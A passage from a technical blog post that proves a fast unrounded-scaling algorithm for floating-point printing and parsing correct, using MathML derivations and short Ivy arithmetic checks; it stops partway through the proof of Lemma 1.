<h1>Fast Unrounded Scaling: Proof by Ivy</h1>
<p>
Russ Cox<br>
January 19, 2026
<p>
Proof that the fast unrounded scaling implementation is correct. (Floating Point Formatting, Part 4)
<p>
My post “<a href="fp">Floating-Point Printing and Parsing Can Be Simple And Fast</a>”
depends on fast unrounded scaling, defined as:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⟨</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>⟩</mo></mrow></mtd></mtr></mtable></math></div>
<p>
The unrounded form of <math><mrow><mi>x</mi><mo>∈</mo><mi>ℝ</mi></mrow></math>, <math><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></math>, is the integer value of <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow></math> concatenated
with two more bits:
first, the “½ bit” from the binary representation of <math><mi>x</mi></math> (the bit representing <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>1</mn></mrow></msup></mrow></math>; <math><mn>1</mn></math> if <math><mrow><mi>x</mi><mo>−</mo><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo><mo>≥</mo><mn>½</mn></mrow></math>; or equivalently, <math><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn></mrow></math>); and second,
a “sticky bit” that is 1 if <i>any</i> bits beyond the ½ bit were 1.
<p>
These are all equivalent definitions, using the convention that a boolean condition is 1 for true, 0 for false:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>≥</mo><mn>½</mn><mo stretchy=false>)</mo><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>∉</mo><mrow><mn>0</mn><mo>,</mo><mn>½</mn></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(‘</mtext><mn>||</mn><mrow><mtext>’</mtext><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>bit</mtext><mspace width='0.3em' /><mtext>concatenation)</mtext></mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>≥</mo><mn>½</mn><mo stretchy=false>)</mo><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>|</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(‘</mtext><mn>|</mn><mrow><mtext>’</mtext><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>bitwise</mtext><mspace width='0.3em' 
/><mtext>OR)</mtext></mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>|</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>4</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr></mtable></math></div>
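<p>
For example, we can spot-check these in Ivy using the third form (<code>uform</code> is only an illustrative helper, not code from the main post):
<pre class='language-ivy'># uform computes the unrounded form of x: floor(2x) followed by a sticky
# bit recording whether 2x has any fractional bits.
op uform x = (2 * floor 2*x) + ((2*x) != floor 2*x)
# x = 11/4 = 2.75: integer part 10 (binary), half bit 1, sticky bit 1, so 1011 = 11
uform 11/4
# x = 3: half and sticky bits both 0, so 1100 = 12
uform 3
</pre>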
<p>
The <math><mtext>uscale</mtext></math> operation computes the unrounded form of <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
so it needs to compute the integer <math><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math>
and then also whether the floor truncated any bits.
One approach would be to compute <math><mrow><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> as an exact rational,
but we want to avoid arbitrary-precision math.
A faster approach is to use a floating-point approximation for <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>:
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><MI>𝑝𝑚</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup></mrow></math>, where <math><MI>𝑝𝑚</MI></math> is 128 bits.
Assuming <math><mrow><mi>x</mi><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup></mrow></math>, this requires a single 64×128→192-bit multiplication,
implemented by two full-width 64×64→128-bit multiplications on a 64-bit computer.
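<p>
A quick Ivy sanity check of that decomposition (a sketch, using the same <code>pe</code> and <code>pm</code> definitions as the Ivy session later in this post):
<pre class='language-ivy'>op pe p = -(127+ceil 2 log 10**-p)
op pm p = ceil (10**p) / 2**pe p
# an arbitrary 64-bit x and the 128-bit pm for p = -29
x = 0x8e151cee6e31e067
P = pm -29
# the two 64-bit words of pm
lo = P mod 2**64
hi = P >> 64
# the two 64x64-bit partial products reassemble the 192-bit product; prints 1
(x*P) == (x*lo) + ((x*hi) << 64)
</pre>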
<p>
The algorithm, which we will call <math><mtext>Scale</mtext></math>, is given integers <math><mi>x</mi></math>, <math><mi>e</mi></math>, and <math><mi>p</mi></math> subject to certain constraints
and operates as follows:
<p>
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>:
<ol>
<li>
Let <math><mrow><MI>𝑝𝑒</MI><mo>=</mo><MO form='prefix'>−</MO><mn>127</mn><mo>−</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>.
<li>
Let <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>, looked up in a table indexed by <math><mi>p</mi></math>.
<li>
Let <math><mrow><mi>b</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>, the number of bits in the binary representation of <math><mi>x</mi></math>.
<li>
Let <math><mrow><mi>m</mi><mo>=</mo><mo>−</mo><mi>e</mi><mo>−</mo><MI>𝑝𝑒</MI><mo>−</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></math>.
<li>
Let <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>,</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. <br>
Put another way, split <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></math> into <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></mrow></math> where <math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math> is <math><mi>b</mi></math> bits, <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> is <math><mi>m</mi></math> bits, and <math><MI>𝑡𝑜𝑝</MI></math> is the remaining bits.
<li>
Return <math><mrow><mo>⟨</mo><mo stretchy=false>(</mo><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mn>1</mn></mrow></msup><mo>⟩</mo></mrow></math>, computed as <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> or as <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math>.</ol>
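<p>
For concreteness, here is <math><mtext>Scale</mtext></math> traced in Ivy for one small input, with exact big-integer arithmetic standing in for the 64×128-bit multiply (a sketch; the variable names mirror the steps above):
<pre class='language-ivy'>op pe p = -(127+ceil 2 log 10**-p)
op pm p = ceil (10**p) / 2**pe p
# example inputs: x = 12345, binary exponent ee = -10, decimal power p = 3
x = 12345
ee = -10
p = 3
# b = bits(x) = 14, since 2**13 <= 12345 < 2**14
b = 14
m = -(ee + (pe p) + b + 1)
prod = x * pm p
top = prod >> (m+b)
middle = (prod >> b) mod 2**m
# the result: top concatenated with the sticky bit (middle != 0); prints 48223
(2 * top) + (middle != 0)
# the integer part matches the exact value of floor(2*x*2**ee*10**p); prints 1
top == floor (2 * x * (2**ee) * 10**p)
</pre>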
<p>
The initial <code>uscale</code> implementation in the main post uses <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> in its result,
but an optimized version uses <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math>.
<p>
This post proves both versions of <math><mtext>Scale</mtext></math> correct for the <math><mi>x</mi></math>, <math><mi>e</mi></math>, and <math><mi>p</mi></math>
needed by the three floating-point conversion algorithms in the main post.
Those algorithms are:
<ul>
<li>
<p>
<code>FixedWidth</code> converts floating-point to decimal.
It needs to call <math><mtext>Scale</mtext></math> with a 53-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>307</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup><mo stretchy=false>)</mo></mrow></math>, which is at most 61 bits
(62-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>53</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>62</mn><mo>=</mo><mn>66</mn></mrow></math>).
<li>
<p>
<code>Short</code> also converts floating-point to decimal.
It needs to call <math><mtext>Scale</mtext></math> with a 55-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>292</mn><mo>,</mo><mn>324</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup><mo stretchy=false>)</mo></mrow></math>, still at most 61 bits.
(62-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>62</mn><mo>=</mo><mn>66</mn></mrow></math>).
<li>
<p>
<code>Parse</code> converts decimal to floating-point.
It needs to call <math><mtext>Scale</mtext></math> with a 64-bit <math><mi>x</mi></math> and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>289</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>54</mn></msup><mo stretchy=false>)</mo></mrow></math>, which is at most 54 bits
(55-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>55</mn><mo>=</mo><mn>73</mn></mrow></math>).</ul>
<p>
The “output” bit counts include the ½ bit but not the sticky bit.
Note that for a given <math><mi>x</mi></math> and <math><mi>p</mi></math>, the maximum result size
determines a relatively narrow range of possible <math><mi>e</mi></math>.
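<p>
(The “at most 61 bits” claim is easy to confirm in Ivy: <math><mrow><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup><mo>≤</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>61</mn></msup></mrow></math>, so every result below <math><mrow><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup></mrow></math> fits in 61 bits.)
<pre class='language-ivy'># prints 1
(2 * 10**18) <= 2**61
</pre>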
<p>
To start the proof, consider a hypothetical algorithm <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
that is the same as <math><mtext>Scale</mtext></math> except using exact real numbers.
(Technically, only rationals are required, so this <i>could</i> be implemented, but it is only a thought experiment.)
<p>
<math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>:
<ol>
<li>
Let <math><mrow><MI>𝑝𝑒</MI><mo>=</mo><MO form='prefix'>−</MO><mn>127</mn><mo>−</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>.
<li>
Let <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup></mrow></math>. <br>
(Note: <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is an exact value, not a ceiling.)
<li>
Let <math><mrow><mi>b</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>.
<li>
Let <math><mrow><mi>m</mi><mo>=</mo><mo>−</mo><mi>e</mi><mo>−</mo><MI>𝑝𝑒</MI><mo>−</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></math>.
<li>
Let <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>,</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. <br>
(Note: <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> are integers, but <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is an exact value that may not be an integer.)
<li>
Return <math><mrow><mo>⟨</mo><mo stretchy=false>(</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>⟩</mo></mrow></math>, computed as <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.</ol>
<p>
Using exact reals makes it straightforward to prove <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> correct.
<div class=lemma id=lemma1>
<p>
<b>Lemma 1</b>. <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. Expand the math in the final result:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>e</mi><mo>−</mo><MI>𝑝𝑒</MI><mo>−</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>m</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><MI>𝑝𝑒</MI><mo>+</mo><mi>e</mi><mo>+</mo><MI>𝑝𝑒</MI><mo>+</mo><mi>b</mi><mo>+</mo><mn>1</mn><mo>−</mo><mi>b</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[rearranging]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>e</mi><mo>+</mo><mn>1</mn></mrow></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: 
